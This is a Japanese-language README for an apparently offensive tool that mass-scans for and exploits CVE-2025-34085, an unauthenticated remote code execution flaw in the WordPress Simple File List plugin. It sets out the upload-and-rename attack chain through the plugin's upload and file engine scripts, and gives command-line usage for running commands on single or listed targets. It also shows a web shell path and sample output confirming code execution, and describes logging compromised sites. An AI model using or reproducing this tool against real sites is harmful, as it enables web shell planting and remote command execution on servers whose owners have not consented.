
WordPress Simple File Listプラグインの認証されていないRCEであるCVE-2025-34085の自動スキャナーおよびエクスプロイト。マルチターゲットスキャン、ウェブシェルアップロード、リモートコマンド実行をサポートします。
WordPress Simple File Listプラグインにおける認証なしのRemote Code Execution(RCE)、特にCVE-2025-34085に脆弱なものを検出・悪用する自動ツールです。
大規模でも効率的に動作するよう、ターゲットの自動クリーンアップシステムとマルチスレッド対応を備えています。
認証なしのファイルアップロード
/wp-content/plugins/simple-file-list/ee-upload-engine.phpファイルを.phpにリネーム
/wp-content/plugins/simple-file-list/ee-file-engine.phpリモートペイロードの実行
python3 main.py -u http://target.com --cmd "id"
targets.txtファイルにターゲットのリストを1行につき1つ配置してください:
python3 main.py --cmd "uname -a"
| 引数 | 説明 |
|---|---|
-u | 単一ターゲット(例: http://example.com) |
--cmd | ターゲット上で実行するコマンド(デフォルト: id) |
--inline | インラインペイロードを使用(?cmd= パラメータなし) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功したターゲットは自動的にvuln.txtファイルに保存されます。
main.py — メインスクリプトtargets.txt — ターゲット一覧clean_targets.txt — URL正規化の結果vuln.txt — 悪用に成功したターゲットのログtargets.txt内の奇妙な文字を削除し、URL形式を修正WordPressサイトの管理者は以下を行うことを推奨します:
このプロジェクトは学習および正当なテストのみを目的としています。
違法な目的での使用は、すべて個人の責任となります。
Cyberlone Indonesiaは、このツールの誤用について一切責任を負いません。
ライセンス: MIT License
合法的かつ責任ある目的のために、自由に使用・改変・再配布してください。
Cyberlone Indonesia
🛠️ リサーチ & エクスプロイトチーム
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n